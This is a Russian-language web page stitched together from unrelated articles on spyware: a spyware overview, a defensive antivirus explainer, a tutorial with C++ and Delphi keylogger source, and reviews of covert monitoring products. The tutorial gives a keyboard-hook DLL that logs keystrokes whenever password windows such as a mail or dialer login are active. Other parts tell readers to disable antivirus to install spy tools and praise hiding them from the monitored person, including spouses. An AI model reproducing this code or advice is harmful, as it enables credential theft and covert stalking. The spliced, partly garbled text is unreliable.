Главная · Интернет · Удобный интернет-магазин программного обеспечения для Windows. Шпионские программы на компьютере

Удобный интернет-магазин программного обеспечения для Windows. Шпионские программы на компьютере

В настоящее время каждый пользователь совершает путешествие по просторам сети. В интернете на юзера могут «нападать» самые разные угрозы. Пользователям следует знать как можно больше информации о шпионах, чтобы постараться защититься от них.

Такого рода вредителя выделены в отдельный класс угроз. Данное программное обеспечение дает возможность одним юзерам установить слежку за другими. В таком случае можно будет просматривать за действиями пользователей без их ведома.

Иногда шпионы могут быть утилитами, но чаще всего они представлены вирусами. Относятся эти вредители к классу spyware. Отличие одной категории от другой в том, что программы-шпионы начинают активничать только после установки.

Шпионские софты могут быть как узкого спектра действия. То есть они выделены в число экранных и клавиатурных шпионов. Также представлены комплексные приложения. Чаще всего эта категория вредителей используется с целью проведения слежения пользователями и их действиями.

Таким образом, начальники могут отслеживать все производимые манипуляции пользователей. Также может быть осуществлен родительский контроль. В общем, отдельная категория программ является невероятно полезной в повседневной жизни.

Особенности шпионов-вирусов и программ

Разнообразие шпионов-утилит велико. Пользователи могут сталкиваться с самыми разными элементами, которые проводят слежку. Но все же стоит выделить отличительные черты программ и вирусов.

Довольно часто антивирусники блокируют шпионские программы, относя их к числу вредоносных. Однако, эти объекты к вредоносным не имеют никакого отношения. Но при этом блокировка их производится все равно.

В чём именно разница между реальным вредителем spyware и теми сервисами, которые предназначены для проведения секретной слежки за персональным компьютером? Отличие данных объектов в выполнении работы и сфере применения.

Шпионские вирусы самостоятельно загружаются на гаджеты без разрешения пользователей. То есть пользователь может быть даже не в курсе того, что на его аппарате «поселились» вредители. При этом они будут совершать различные кражи данных, копирование файлов и порчу документов. В общем, вредители ведут себя соответственно.

Шпионы-софты в свою очередь должны быть установлены непосредственно пользователем. Данные программы реально являются помощниками. Они нужны для того, чтобы контролировать прочих пользователей.

Разные типы шпионов. Контроль за набором на клавиатуре

Каждый пользователь может столкнуться с такими вредителями. Но в некоторых случаях юзеры могут об этом даже не догадываться. Наиболее опасным видом являются кейлоггеры. Именно эти вредители встречаются намного чаще всех остальных.

Данные объекты могут быть специально встроенными в систему для осуществления слежки или относится к числу самостоятельных видов вредителей. В их принципе действия разницы особой не существует.

Клавиатурные шпионы разработаны с целью осуществления контроля за теми действиями, которые производит пользователь в процессе работы за персональным компьютером. Различные кейлоггеры различаются в основном именно по принципу действий. В некоторых случаях они могут только изредка активничать.
Причем, размещены такого рода элементы зачастую именно на винчестере.

В этом случае пользователь может даже не знать о том, что все его пароли успешно копируются и передаются сторонним юзерам. В дальнейшем обеспечивается доступ к конфиденциальной информации, которая используется мошенниками по своему усмотрению.

Вряд ли шпионы просто «подглядывают». Всегда они копируют информацию с целью дальнейшего ее использования для реализации собственных целей. Злоумышленник может взломать чужой аккаунт, вносить коррективы в настройки, сменить указанный пароль и выполнить прочие манипуляции, чтобы максимально навредить владельцу учетной записи.

Но поскольку устанавливать шпиона могут администраторы устройств, то в таком случае блокироваться данные софты не будут. Это связано с тем, что они вносятся в исключения. Так что они не будут восприниматься в качестве угроз.

Простой и очень актуальный шпион

Пользователи в процессе работы на ПК могли сталкиваться с SC-KeyLog. Данный: кейлоггер является бесплатным. Но определяется он установленными на аппарате защитниками еще в момент выполнения загрузки такого объекта.

Если юзер принял решение установить данное программное обеспечение, то он может сразу же внести его в список безопасных для устройства утилит. В таком случае антивирусник не будет производить блокировку загружаемого объекта.

Далее нужно будет выбрать то место, где файл с сервисом в дальнейшем будет располагаться. Исполняемый файл следящего модуля после этого разместиться на указанном ранее диске. Как только установка ПО будет завершена, то пользователи могут уже переходить к настройке данного сервиса.

Необходимо указать адрес электронки, на которой будут присылаться данные о перехвате информации. Когда все самые важные настройки реализованы, то файлы данного сервиса будут моментально внесены в список доверенных программ антивируса. На этом этапе все подготовительные работы завершены в полном объеме.

SC-KeyLog в ходе работы отображает заголовки всех тех окон, с которыми работает юзер. Также утилита в полной мере контролирует все те действия, которые производятся на клавиатуре. Но есть один недостаток: невозможность автоматического переключения раскладки. Так что все тексты выводятся исключительно английскими буквами.

Шпионы более широкого спектра действия

Также пользователи могут столкнуться с комплексными вредителями. Хотя наиболее распространены именно кейлоггеры, но при этом они хороши исключительно в тех случаях, когда вполне достаточно знать, что именно вводится на клавиатуре и запуск каких утилит производится.

Но в некоторых случаях информации этой совсем не хватает. Поэтому были созданы комплексные софты, которые работают в наиболее сложном режиме. Используются они для ведения всестороннего шпионажа. Эти комплексные объекты могут быть наполнены несколькими актуальными компонентами.

В их числе кейлоггеры, перехватчики буфера обмена, шпионы по отслеживанию выводимых на экран гаджета данных. Также пользователи могут использовать встроенный регистратор запуска и активности программ и многое другое.

Яркие представители бесплатных комплексных шпионов

Чтобы оценить принцип работы такого рода программных продуктов, нужно на практике проверить их работоспособность. Для примера можно рассмотреть софт Softex Expert Home. Это бесплатная русскоязычная система. Утилита эта будет моментально блокировать самые разные нажатия клавиатуры.

Также производится детальный мониторинг запущенных сервисов, а также полный контроль их активности. Проверке подвергаются все активные действия пользователя, работа с собственными учетными записями и многое другое.

Но также как и в отношении прочих утилит такого направления, при загрузке этого софта выполняется блокировка. Установленные антивирусники моментально реагируют на установку такого приложения и принимают его в качестве угрозы. По этой причине блокировка – это первое, что делают защитники.

Поэтому необходимо будет отключить работу антивируса. Как только установка выбранного сервиса будет произведена, то снова активируем работу защитника. Во время установки шпиона потребуется задать сочетание клавиш, при нажатии которых будет произведен вызов интерфейса.

Также следует установить пароль, который будет открывать доступ к данным, собранным в ходе функционирования данного софта. Шпион после установки потребуется перенести в список с положительными сервисами, действия которых не должны быть заблокированы.

Softex Expert Home функционировать может не только в обычном, но и в стационарном режиме. при этом на экране не будут созданы ярлыки и прочие атрибуты программы. При нажатии ранее выбранных клавиш сразу же будет загружаться основное окно ПО.

В появившемся окошке указывается секретный ключ, а после нужно будет перейти в раздел с настройками. Производим корректировку важных параметров. Пользователям этого сервиса для шпионажа за домашним ПК вполне достаточно.

Ещё одной бесплатной комплексной программой является Refog Free Keylogger. Простой интерфейс непременно порадует пользователей. Данное программное обеспечение помогает осуществлять перехват переписки в установленных мессенджерах, следит за социальными сетями.

В общем, утилита «умеет» производить огромное количество самых разных действий при помощи стандартного Проводника. Приложение контролирует всю операционную систему и все производимые в ней изменения. В ходе работы утилита может блокироваться антивирусом, если будут применяться необходимые эвристические алгоритмы.

Главным недостатком бесплатной версии отмечаются некоторые ограничения. Связано это с некоторыми аспектами в проведении слежки. В остальном же сбоев не наблюдается.

Также пользователи могут устанавливать такого рода шпионы и на мобильные девайсы. В сети можно будет найти несколько актуальных помощников такого плана. Ярким представителем является утилита KidLogger. Это весьма актуальный мультиплатформенный софт для слежки.

Коварные анализаторы трафика

Благодаря такого рода приложениям злоумышленники подключаются к сессии в сети. При этом они могут выполнять все манипуляции от лица пользователя.
Мошенники могут пользоваться всеми паролями, осуществлять вход на различные аккаунты и прочие сайты.

По этой причине крайне важно производить шифрование трафика. Больше всего угроза падает на пользователей, принявших решение работать с общественными сетями.

NirSoft SmartSniff – это классический представитель снифферов. Данный сервис помогает провести перехват данных, которые могут красть мошенники. Также утилита направлена на проведение отладки сети.

Но поскольку пользователи все чаще предпочитают проводить работу на стационарных аппаратах, то и для этой категории устройств предусмотрены софты данного типа. Для Android подойдет WireShark Shark for Root.

Благодаря этому сервису мошенникам удается осуществлять кражу данных непосредственно с мобильника. Достаточно подключить смартфон или планшет к публичной точке доступа.

Борьба с вредителями. Меры противодействия

Каждый пользователь непременно должен бороться со шпионами. Если знать принцип их действия, то можно будет подобрать наиболее актуальные способы устранения данного типа вредителей. Конечно же, пользователи самостоятельно могут следить за действиями на аппаратах, но это может осуществлять с добрыми намерениями.

Если же мошенники пытаются проникнут в устройство для заполучения данных, которые являются конфиденциальными, чтобы в дальнейшем использовать их. Противодействовать шпионам сложно, но это вполне реализуемая задача.

Первое, что необходимо выполнить, так это провести обновление баз антивирусных программ. Также нужно будет проверить все объекты, которые находятся в «белом» списке защитника. При этом важно убедиться в том, что подозрительных объектов в нем нет.

Пользователям обязательно работать не с простыми антивирусами. Лучшими в данной категории являются AdwCleaner и AVZ. Данные программные продукты относятся к числу наиболее часто используемых для выполнения блокировки от угроз самых разных типов.

Также может помочь утилита AnVir Task Manager. Особенность функционирования приложения в том, что оно направлено на определение имен и адресов всех запущенных процессов. При этом с точностью определяется степень вреда, который может быть нанесен системе. Утилиты эти надежны в том, чтобы быстро обезвреживать даже снифферы.

Пользуясь Интернетом, не стоит думать, что Ваша конфиденциальность защищена. Недоброжелатели часто следят за Вашими действиями и стремятся заполучить Вашу личную информацию с помощью особого вредоносного ПО – шпионских программ. Это один из самых старых и самых распространенных типов угроз в сети Интернет: эти программы без разрешения проникают на Ваш компьютер, чтобы инициировать различные противозаконные действия. Стать жертвой таких программ очень легко, однако избавиться от них бывает сложно – особенно в том случае, когда Вы даже не знаете, что Ваш компьютер заражен. Но не стоит отчаиваться! Мы не оставим Вас один на один с угрозами! Вам лишь нужно знать, что такое шпионские программы, как они проникают на компьютер, как они пытаются навредить Вам, как устранить эти программы и как можно предотвратить атаки шпионских программ в будущем.

Что такое шпионская программа?

История шпионских программ

Термин «шпионская программа» впервые был упомянут в 1996 году в одной из специализированных статей. В 1999 году этот термин использовался в пресс-релизах и уже имел то значение, которое закреплено за ним сегодня. Он быстро приобрел популярность в средствах массовой информации. Прошло немного времени, и в июне 2000 года было выпущено первое приложение, предназначенное для борьбы со шпионскими программами.

«Первые упоминания о шпионских программах датируются 1996 годом».

В октябре 2004 года медийная компания America Online и Национальный альянс кибербезопасности (NCSA) провели исследование данного феномена. Результат оказался невероятным и пугающим. Около 80 % всех пользователей сети Интернет так или иначе сталкивались с проникновением шпионских программ на свои компьютеры, приблизительно на 93 % компьютеров присутствовали компоненты шпионских программ, при этом 89 % пользователей не знали об этом. И почти все пользователи, пострадавшие от шпионских программ (около 95 %), признали, что не давали разрешения на их установку.

На сегодняшний день операционная система Windows является предпочтительной целью для атак шпионских программ в силу своей широкой распространенности. Вместе с тем, в последние годы разработчики шпионских программ также обращают внимание на платформу Apple и на мобильные устройства.

Шпионские программы для Mac

Исторически сложилось так, что авторы шпионских программ считают своей главной целью платформу Windows, поскольку она имеет более обширную базу пользователей, чем платформа Mac. Несмотря на это в 2017 году отрасль пережила существенный всплеск активности вредоносного ПО для компьютеров Mac, причем большая часть атак была совершена посредством шпионских программ. Шпионские программы для Mac имеют модель поведения, аналогичную шпионским программам для Windows, однако среди них преобладают программы для кражи паролей и бэкдоры общего назначения. К вредоносным действиям ПО, принадлежащего ко второй категории, относится удаленное выполнение вредоносного кода, кейлоггинг , захват изображения экрана, произвольная загрузка и скачивание файлов, фишинг паролей и т. д.

«В 2017 году отрасль пережила существенный всплеск активности вредоносного ПО для компьютеров Mac, причем большая часть атак была совершена посредством шпионских программ».

Помимо вредоносных шпионских программ, в среде Mac также нередко встречаются так называемые «законные» шпионские программы. Эти программы продаются реально существующими компаниями на официальных веб-сайтах, а в качестве их основной цели декларируется контроль за детьми или сотрудниками. Разумеется, такие программы являются классической «палкой о двух концах»: они допускают возможность злоупотребления своими функциями, поскольку предоставляют обычному пользователю доступ к инструментарию шпионских программ, не требуя для этого каких-либо специальных знаний.

Шпионские программы для мобильных устройств

Шпионские программы не создают ярлыка и могут подолгу находиться в памяти мобильного устройства, похищая важную информацию, например входящие/исходящие SMS-сообщения, журналы входящих/исходящих звонков, списки контактов, сообщения электронной почты, историю браузера и фотографии. Кроме того, шпионские программы для мобильных устройств потенциально могут отслеживать нажатия клавиш, записывать звуки в радиусе действия микрофона Вашего устройства, делать фотографии в фоновом режиме, а также отслеживать положение Вашего устройства с помощью GPS. В некоторых случаях шпионским программам даже удается контролировать устройство с помощью команд, отправляемых по SMS и/или приходящих с удаленных серверов. Шпионские программы отправляют похищенные сведения по электронной почте или посредством обмена данных с удаленным сервером.

Не стоит забывать, что потребители являются не единственной целью злоумышленников, создающих шпионские программы. Если Вы используете свой смартфон или планшетный компьютер на рабочем месте, хакеры могут атаковать организацию Вашего работодателя за счет уязвимостей, заложенных в системе мобильных устройств. Более того, группам реагирования на инциденты в области компьютерной безопасности может быть не под силу выявлять атаки, совершаемые через мобильные устройства.

Шпионские программы обычно проникают на смартфоны тремя способами:

  • Незащищенная бесплатная Wi-Fi-сеть, которая часто устанавливается в публичных местах, например в аэропортах и кафе. Если Вы зарегистрировались в такой сети и передаете данные через незащищенное соединение, злоумышленники могут следить за всеми действиями, которые Вы совершаете, пока остаетесь в сети. Обращайте внимание на предупреждающие сообщения, отображаемые на экране Вашего устройства, – особенно в том случае, если они указывают на сбой при проверке подлинности удостоверения сервера. Позаботьтесь о своей безопасности: избегайте таких незащищенных соединений.
  • Уязвимости операционной системы могут создать предпосылки для проникновения вредоносных объектов на мобильное устройство. Производители смартфонов часто выпускают обновления для операционных систем, чтобы защитить пользователей. Поэтому мы рекомендуем Вам устанавливать обновления, как только они становятся доступными (до того, как хакеры попытаются атаковать устройства, на которых установлены устаревшие программы).
  • Вредоносные объекты часто скрываются в обычных на первый взгляд программах – и вероятность этого возрастает в том случае, если Вы загружаете их не через магазин приложений, а с веб-сайтов или через сообщения. Во время установки приложений важно обращать внимание на предупреждающие сообщения, особенно если они запрашивают разрешение на доступ к Вашей электронной почте или другим персональным данным. Таким образом, мы можем сформулировать главное правило безопасности: пользуйтесь только проверенными ресурсами для мобильных устройств и избегайте приложений сторонних разработчиков.

Кого атакуют шпионские программы?

В отличие от других типов вредоносного ПО, разработчики шпионских программ не стремятся нацелить свои продукты на какую-либо конкретную группу людей. Напротив, в ходе большинства атак шпионские программы разворачивают свои сети очень широко, чтобы поразить как можно больше устройств. Следовательно, каждый пользователь потенциально является целью шпионских программ, ведь, как справедливо полагают злоумышленники, даже самый крохотный объем данных рано или поздно найдет своего покупателя.

«В ходе большинства атак шпионские программы разворачивают свои сети очень широко, чтобы поразить как можно больше устройств».

Например, спамеры покупают адреса электронной почты и пароли, чтобы рассылать вредоносный спам или совершать какие-либо действия под видом других лиц. В результате атак шпионских программ на финансовую информацию кто-то может лишиться средств на банковском счете или стать жертвой аферистов, использующих в своих махинациях настоящие банковские счета.

Информация, полученная из похищенных документов, изображений, видеозаписей и других цифровых форм хранения данных, может использоваться для вымогательства.

В конечном итоге никто не застрахован от атак шпионских программ, а хакеры особо не задумываются над тем, чьи компьютеры они заражают в погоне за достижением своих целей.

Что делать, если мой компьютер заражен?

Проникшая в систему шпионская программа стремится оставаться незамеченной, и обнаружить ее можно только в том случае, если пользователь обладает достаточным опытом и действительно знает, где следует искать. Так что многие пользователи продолжают работать, не подозревая об угрозе. Но если Вам кажется, что на компьютер проникла шпионская программа, нужно прежде всего очистить систему от вредоносных объектов, чтобы не скомпрометировать новые пароли. Установите надежный антивирус, который способен обеспечить должную кибербезопасность и использует агрессивные алгоритмы обнаружения и удаления шпионских программ. Это важно, поскольку только агрессивные действия антивируса способны полностью удалить из системы артефакты шпионских программ, а также восстановить поврежденные файлы и нарушенные настройки.

Очистив систему от угроз, обратитесь к представителям своего банка, чтобы предупредить о потенциальной вредоносной активности. В зависимости от того, какая информация была скомпрометирована на зараженном компьютере (особенно если он подключен к сети предприятия или организации), закон может требовать от Вас сообщить правоохранительным органам о фактах проникновения вирусов или сделать соответствующее публичное заявление. Если информация носит деликатный характер или связана со сбором и передачей изображений, аудио- и/или видеофайлов, Вам следует обратиться к представителю правоохранительных органов и сообщить о потенциальных нарушениях федерального или местного законодательства.

И последнее: Многие поставщики средств защиты от кражи идентификационных данных заявляют, что их сервисы могут выявлять мошеннические транзакции или временно блокировать Ваш кредитный счет во избежание ущерба от вредоносных действий нежелательных программ. На первый взгляд, блокировка кредитной карты – действительно здравая идея. Однако компания Malwarebytes настоятельно рекомендует не покупать средства защиты от кражи идентификационных данных .

«Многие поставщики средств защиты от кражи идентификационных данных заявляют, что их сервисы могут выявлять мошеннические транзакции».

Как защититься от шпионских программ?

Наилучшая защита от шпионских программ, как и от большинства типов вредоносного ПО, в первую очередь зависит от Ваших действий. Пожалуйста, следуйте этим базовым рекомендациям, благодаря которым Вы сможете обеспечить свою кибербезопасность:

  • Не открывайте электронные письма, присланные неизвестными отправителями.
  • Не загружайте файлы из непроверенных источников.
  • Прежде чем переходить по ссылке, наводите на нее курсор мыши, чтобы проверить, на какую веб-страницу она Вас приведет.

Но по мере того как пользователи накапливали опыт в области кибербезопасности, хакеры тоже становились хитрее, создавая все более изощренные способы доставки шпионских программ. Именно поэтому установка антивируса, доказавшего свою эффективность, чрезвычайно важна для противодействия самым современным шпионским программам.

Ищите антивирусы, которые предоставляют защиту в реальном времени. Данная функция позволяет автоматически блокировать шпионские программы и другие угрозы до того, как они смогут навредить Вашему компьютеру. Некоторые традиционные антивирусы и другие средства обеспечения кибербезопасности во многом полагаются на сигнатурные алгоритмы обнаружения – а такую защиту легко обойти, особенно если речь идет о современных угрозах.
Также следует обращать внимание на наличие функций, которые блокируют само проникновение шпионских программ на компьютер. Например, это может быть технология противодействия эксплойтам и защита от вредоносных веб-сайтов, на которых хранятся шпионские программы. Premium-версия программы Malwarebytes имеет проверенную репутацию и является надежным средством защиты от шпионских программ.

В цифровом мире опасности являются неотъемлемой частью интернет-действительности и могут подстерегать Вас на каждом шагу. К счастью, есть простые и эффективные способы защититься от них. Если Вы будете поддерживать разумный баланс между применением антивируса и соблюдением основных мер предосторожности, Вам удастся оградить каждый используемый компьютер от атак шпионских программ и от действий злоумышленников, которые за ними стоят.
Со всеми нашими отчетами о шпионских программах Вы можете ознакомиться

О написании клавиатурных шпионов
рассказывалось уже неоднократно, но все они
имеют один большой недостаток — как правило,
требуется узнать весьма ограниченную
информацию, а не записывать в файл лога все,
что юзер пишет на клавиатуре — вряд ли тебе
даст много пищи для размышлений логи
нажатия на кнопки при игре в CS 😉

Отсюда следует, что шпион должен быть
продвинутым, а не тупо писать в лог все, что
ему дают 🙂 Даже назвать такую программу
шпионом язык не поворачивается — это почти
электронный агент 007:-))) Путей для того,
чтобы программа писала в лог интересующий
нас материал много. Самый простой —
контролировать активные окна, т.е. в которых
в данный момент давятся кнопки 🙂 Как ты,
думаю, знаешь, шпионы как правило состоят из
исполняемого файла и DLL. Это связано с тем,
что для перехвата сообщений к окну
требуется создать новый ПРОЦЕСС, и самое
удобное для этого — использовать dll-ку.
Поэтому для того, чтобы активировать
собственно сам логгер, нужно будет в нужный
момент загрузить DLL, а когда активное окно
сменится на иное — выгрузить ее из памяти.

Рассмотрим функции работы с DLL в языке Visual
C++. Загрузка в память длл-ки производится
функцией hINSTAGE=LoadLibrary("name.dll"), где hINSTAGE —
как бы дескриптор загруженной в память DLL,
name.dll — имя библиотеки. Чтобы ее выгрузить,
существует функция FreeLibrary(hINSTAGE);

Теперь о том, как можно нужные нам
приложения. Например, нам известно, что юзер
читает почту через сайт www.mail.ru, тогда можно
настроить агента так, чтобы он перехватывал
нажатия клавиш, когда юзер зайдет на этот
сайт. (Следует помнить, что в некоторых
приложениях шпион клавиатуры вообще не
может работать, например в адресной строке
Internet Explorer’a — это приводит к "аварийному
завершению программ" — а чего иного ты от
Windows хотел:))) Для этого способа вполне
подойдет и чтение паролей из "звонилки"
— если юзер страдает паранойей и каждый раз
вводит логин и пасс вручную 🙂 Или тебе очень
интересно узнать что же он пишет в Outlook’e или
в блокноте. Вот часть кода, выполняющая
сравнение заголовков окон с нужными нам.

HINSTAGE hINSTAGE;

while (1)
{
//Запускаем цикл.

int sl,ll;
ll=1;
sl=2;
//переменные для
счетчик
а.
char st;
HWND hw;
//Идем самым простым
путем — сравниваем посимвольно строки:
полученный заголовок окна и с нужном нам
строкой.

while (ll!=sl)
{

hw=GetForegroundWindow();
GetWindowText(hw,st,128);// читаем

char stt="_Здесь пишем заголвок нужного
нам окна_№1";

sl=strlen(stt);
ll=0;
while (stt==st)
//cравниваем
посимвольно строки
//это удобнее делать с той позиции, что будет
проверяться, вхордит ли нужная
//нам строка как часть в другую строку, можно
сделать подобие //широкого фильтра.

{
ll++;
}

if (ll==sl) {//если строки
совпадают до конца 1-ой строки —

halt; //прерываем процесс
}
// и так далее — если
нужно проверить на наличие нескольких окон.

char stt="_Здесь пишем заголвок нужного
нам окна_№2";
sl=strlen(stt);
ll=0;
while (stt==st)
{
ll++;
}

if (ll==sl) {
halt; //прерываем процесс
}

Вместо последовательной проверки можно
сделать параллельную, когда сравниваются в
одном цикле элементы строк, если хоть одна
совпала — тогда DLL-шпион активизируется.

hINSTAGE=LoadLibrary("key1.dll");

Теперь нам нужно все время проверять,
остается ли данное окно активным.

while (ll==sl) //пока
строки совпадают — крутимся на месте

{
hw=GetForegroundWindow();
GetWindowText(hw,st,128);
// читаем
активное на данный момент окно.

ll=0;
while (stt==st)
{
ll++;
}
}

Выход из цикла говорит о том, что активное
окно сменилось, поэтому далее выгружаем "шпионскую"
библиотеку и цикл начинается с начала — т.е.
прога опять ждет, когда выпадет одно из
нужных окон.

FreeLibrary(hINSTAGE);

Однако же вышеописанный способ имеет и
недостатки — требуется каждый раз проверять
из целого списка окон является ли нужное
нам активным на данный момент. Поэтому
можно юзать другой алгоритм — проверять не
заголовок окна, а смотреть, если в данном
окне элементы типа EditBox’а. Как правило,
пароли пишутся именно там 🙂 Для этого будет
смотреть на элементы этого окна — и если
среди них есть Edit — тогда грузим DLL.

char p2,p3; //массивы
символов для заголвков окон.

Опять таки в циклe проверяем все окна:

while (p3!="Edit") //пока
не нашли окно с едитбоксом — выполняем цикл

{

hw=GetForegroundWindow();

HWND hwnd_child;//переменная
элемента окна

hwnd_child = GetWindow(hw,GW_CHILD);
GetClassName(hwnd_child,p3,128);
if (p3!="Edit")
//если первый из
найденных элементов окна- не EditBox — тогда
ищем дальше

{
while (hwnd_child!=0)
{
hwnd_child = GetWindow(hwnd_child, GW_HWNDNEXT);

GetClassName(hwnd_child,p3,128);
if (p3=="Edit")
{
halt;
}
}
}
}

Теперь собственно о самой шпионской DLL.
Писать ее лучше на Дельфях, потому как этот
возмужавший потомок Паскаля не имеет столь
извращенной "Сипипишной" привычки
придирки к типам данных. Чтобы создать
библиотеку выберем File-New-Direct Link Library — и
заготовка для DLL готова. А вот сам код:

library key1;
uses Windows;

var
KHook: HHOOK;//переменная для
"ловушки"

function KProc(Code: integer; wParam: Word; lParam: LongInt): LongInt; stdcall;
const
KState: integer = 1073741824; //код
"клавиша нажата"

var
Simv: ShortString;
KL: array of Char;//для
проверки раскладки клавы

FStruct: TOFSTRUCT;
F: TextFile;
//переменная
файла для записи лога.

begin

// отсеиваем лишние
сообщения
if (lParam and KState) <> 0 then
begin

Exit;
end;

AssignFile(F, ‘keylog.txt’);

// пытаемся открыть
файл ‘keylog.txt’:
if OpenFile(PChar(‘keylog.txt’), FStruct, OF_EXIST) = HFILE_ERROR then
begin
ReWrite(F);
// если файл не
создан — создаем.

end
else Append(F);
//если есть — пишем в
конец.

Simv:=chr(0);//обнуляем
переменную символа, читающегося с клавы.

// анализируем код
нажатой клавиши
case wParam of
// цифры
48..57: Simv:=Chr(wParam);
96: Simv:=’0′;
97: Simv:=’1′;

104: Simv:=’8′;
105: Simv:=’9′;
189,109: Simv:=’-‘;
110: Simv:=’.’;
111: Simv:=’/’;
end;

GetKeyboardLayoutName(KL); //
проверяем раскладку

if KL = ‘00000409’ then
// если
латинская:

begin
case wParam of
219: Simv:="[‘;
221: Simv:=’]’;
186: Simv:=’;’;
222: Simv:=’"’;
188: Simv:=’,’;
190: Simv:=’.’;
191: Simv:=’/’;
65..90: Simv:=Chr(wParam);
end;
end;
end;
if KL = ‘00000419’ then
// если
русская

begin
case wParam of
219: Simv:=’Х’;
221: Simv:=’Ъ’;
186: Simv:=’Ж’;
222: Simv:=’Э’;
188: Simv:=’Б’;
190: Simv:=’Ю’;
191: Simv:=’.’;
65: Simv:=’Ф’;

87: Simv:=’Ц’;
88: Simv:=’Ч’;
89: Simv:=’Н’;
90: Simv:=’Я’;
end;

//если символ не пустой(т.е.
если была нажата буквенно-цифровая клавиша)
//тогда пишем его в файл
if Simv<>» then
Write(F, Simv);
//закрываем файл
CloseFile(F);

// передаем сообщение
другим ловушкам в системе
Result:=CallNextHookEx(KHook, code, wParam, lParam);
end;

begin
//Установить ловушку
для перехвата сообщений о клавиатуры.

KHook:=SetWindowsHookEx(WH_KEYBOARD, @KProc, HInstance, 0);

Так же эту программу можно упростить в
зависимости от области применения — если
допустим нужно только считать один раз
пароль из звонилки — тогда можно поставить
проверку на окна до нужного нам, и когда оно
станет активным — загрузить библиотеку
key1.dll, подождать определенное время, за
которое юзер успеет набить эти символы на
клавиатуре, а затем выгрузить библиотеку и
завершить программу. Примерно так 🙂

hINSTAGE=LoadLibrary("key1.dll");
Sleep(10000);
//ждать 10 секунд, за это
время юзер наберет пароль.
//время может быть увеличено в зависимости
от степени заторможенности юзера
// и его скрости печатанья на клаве 🙂

FreeLibrary(hINSTAGE);

PS: Весь вышеперечисленный материал был дан
исключительно с демонстрационными и
общеобразовательными целями, автор ставил
перед собой задачу продемонстрировать
алгоритм работы программы типа "апгрейженный
клавиатурный шпион" и вся
ответственность за использования этого
материала ложится на тебя (непосильным
бременем 🙂) В реализации кода присутствуют
мелкие неточности, не вредящие собственно
алгоритму — попробуй найти их сам)).

PSS: Конечно же кейлоггер может не только
выполнять свою основную функцию —
собственно писать в лог нажатия кнопок, но и
изменять значения нажатых клавиш по твоему
вкусу — но как это сделать и для чего это
может быть просто жизненно необходимо — в
следующий раз 🙂

Как узнать, чем занимается на компьютере ваш ребенок или сотрудник? Какие сайты посещает, с кем общается, что и кому пишет?

Для этого существуют программы-шпионы - особая разновидность софта, который незаметно для пользователя собирает информацию обо всех его действиях. Программа шпион для компьютера решит эту задачу.

Шпионское ПО для компьютера не нужно путать с троянским: первое является абсолютно легитимным и устанавливается с ведома администратора, второе - попадает на ПК нелегально и ведет скрытую вредоносную деятельность.

Хотя использовать легитимные программы слежения могут и злоумышленники.

Приложения-шпионы чаще всего устанавливают руководители предприятий и системные администраторы для контроля сотрудников, родители для слежки за детьми, ревнивые супруги и т. д. При этом «жертва» может знать, что за ней ведется наблюдение, но чаще всего - не знает.

Обзор и сравнение пяти популярных программ-шпионов

NeoSpy

NeoSpy - это универсальная программа-шпион за клавиатурой, экраном и действиями пользователей. NeoSpy работает невидимо и может прятать свое присутствие уже при установке.

Пользователь, который устанавливает программу, имеет возможность выбрать один из двух режимов инсталляции - администраторский и скрытый. В первом режиме программа ставится открыто - создает ярлык на рабочем столе и папку в каталоге Program Files, во втором - скрыто.

Процессы программы не отображаются в диспетчере задач Windows и диспетчерах задач сторонних производителей.

Функциональные возможности NeoSpy довольно широки и программа может использоваться как в качестве домашнего слежения, так и в офисах для контроля сотрудников.

Программа шпион распространяется в трех версиях по условно-бесплатной лицензии. Цена составляет 820-1990 рублей, но может работать и бесплатно (даже в скрытом режиме) с ограничениями при просмотре отчетов.

Что может NeoSpy:

  • вести мониторинг клавиатуры;
  • следить за посещением сайтов;
  • показывать в реальном времени экран пользователя через интернет с другого компьютера или с планшета;
  • делать скриншоты экрана и сохранять снимки с веб-камеры;
  • контролировать системные события (включение, выключение, простои в работе компьютера, подключение съемных носителей);
  • перехватывать содержимое буфера обмена;
  • Следить за использованием Интернет-мессенджеров, записывать звонки по Skype;
  • перехватывать данные, отправляемые на печать и копируемые на внешние носители;
  • вести статистику работы за компьютером;
  • отправлять координаты ноутбука (вычисляются по Wi-Fi).

Благодаря русскоязычному интерфейсу, широкому набору функций, корректному перехвату клавиатуры и полностью скрытому в системе режиму работы, NeoSpy получает максимальную оценку при выборе программы для контроля пользователей.

Real Spy Monitor

Следующий шпион - Real Spy Monitor. Эта англоязычная программа обладает не только функциями слежения, но и может блокировать определенные действия на компьютере. Поэтому ее часто используют как средство родительского контроля.

Для каждой учетной записи в настройках Real Spy Monitor можно создать свою политику запретов, например, на посещение определенных сайтов.

К сожалению, из-за отсутствия англоязычного интерфейса, разобраться с работой Real Spy Monitor сложнее, несмотря на графические миниатюры к кнопкам.

Программа также платная. Лицензия стоит от $39.95.

Возможности Real Spy Monitor:

  • перехват нажатий клавиш, содержимого буфера обмена, системных событий, веб-сайтов, мессенджеров, почты;
  • работа в полускрытом режиме (без активного окна, но с отображением процесса в диспетчере задач);
  • работа с несколькими учетными записями;
  • выборочный автозапуск для разных учетных записей.

В целом, Real Spy Monitor нравится многим пользователям, из недостатков отмечают высокую стоимость, отсутствие русскоязычного интерфейса и отображение процесса в диспетчере задач.

Actual Spy

Actual Spy разработчики позиционируют как кейлоггер (клавиатурный шпион), хотя программа умеет больше, чем просто записывать нажатия клавиш.

Она контролирует содержимое буфера обмена, делает скриншоты экрана, следит за посещениями сайтов и прочее, что входит в основной набор рассмотренных нами шпионов.

При установке Actual Spy создает ярлык в меню Пуск, поэтому может быть замечен пользователем. Запуск тоже происходит открыто - для сокрытия окна программы необходимо нажимать определенные клавиши.

Возможности Actual Spy мало чем отличаются от возможностей конкурентов. Из недостатков пользователи отметили то, что он корректно записывает нажатия клавиш только в английской раскладке.

SpyGo

SpyGo - шпионский комплект для домашнего использования. Может использоваться и в офисах для контроля сотрудников.

Для начала мониторинга достаточно нажать в SpyGo кнопку «Старт».

SpyGo распространяется по условно-бесплатной лицензии и стоит 990-2990 рублей в зависимости от набора функций.

В пробных версиях продолжительность мониторинга ограничена 20 минутами в день, а также недоступна отправка отчетов на электронную почту и по FTP.

Основные возможности SpyGo:

  • мониторинг нажатия клавиш;
  • запись всех действий на компьютере (запуск программ, операции с файлами и прочее);
  • контроль посещений веб-ресурсов (история, поисковые запросы, часто посещаемые сайты, продолжительность нахождения на сайте);
  • запись происходящего на экране;
  • сохранение содержимого буфера обмена;
